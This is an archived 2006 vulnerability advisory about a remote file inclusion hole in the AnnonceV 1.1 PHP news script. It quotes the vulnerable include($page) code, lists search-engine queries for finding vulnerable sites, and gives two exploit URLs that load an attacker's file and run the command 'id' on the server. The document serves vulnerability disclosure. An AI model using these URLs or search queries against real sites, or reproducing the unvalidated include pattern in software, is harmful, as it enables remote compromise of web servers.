Security Advisory: [Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SA21781] VCD-db Comments Script Insertion Vulnerability
  [SA21757] MySource Classic Equation Attribute PHP Code Injection
  phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit
  Beautifier v0.1 Remote File Inclusion Vulnerability

From: botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date: 06.09.2006
Subject: [Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability

* Kurdish Security Advisory
* Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.htm
l
* Script : AnnonceV
* Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
* Version : 1.1
* Risk : High
* Class : Remote
* Contact : botan@linuxmail.org and irc.gigachat.net #kurdhack
* Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and other my friends
---------------------------------------------------------------------------------
--

Google w0rkez :P : "AnnonceV1.1"
: "/admin/annonce.php"
: "/annonce.php"

lol now code :]

$page=$_GET['page'];

if(substr($page, -3) == 'txt')//pour les news
{
include("newsdisplay.php");
}

else //pour toutes les autres pages
{
include($page.".php");
}

?>

http://www.site.com/annonce.php?page=yourcode.txt?&cmd=id
http://www.site.com/admin/annonce.php?page=yourcode.txt?&cmd=id

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

test server